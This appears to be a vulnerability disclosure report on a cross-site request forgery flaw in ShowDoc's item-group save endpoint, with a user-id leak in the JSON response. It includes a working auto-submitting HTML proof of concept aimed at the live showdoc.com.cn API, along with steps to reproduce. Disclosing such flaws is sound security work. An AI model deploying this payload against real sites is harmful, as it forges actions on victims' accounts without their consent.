An attacker is able to create a new group for any item if users visit the attacker’s website. Furthermore, the user-id “uid” is also exposed via the JSON response.
We can bypass the CSRF protection by putting our payload in an iframe or a standalone HTML file and then sending it to the victim.
PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.showdoc.com.cn/server/index.php?s=/api/itemGroup/save" method="POST">
<input type="hidden" name="group_name" value="testcsrf" />
<input type="hidden" name="id" value="" />
<input type="hidden" name="item_ids" value="1704644990568304" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
1. Open PoC.html in any browser.
2. Now you can check that a new group named testcsrf is created and that the item with id=1704644990568304 is added to that group.
Furthermore, the user id uid is also exposed via the JSON response:
{"error_code":0,"data":{"id":"2002","uid":"359287","group_name":"testcsrf","item_ids":"1704644990568304","s_number":"0","created_at":"2021-11-21 12:10:25","updated_at":"2021-11-21 12:10:25"}}
You can check my video PoC here: PoC
This can result in the exposure of data or unintended code execution.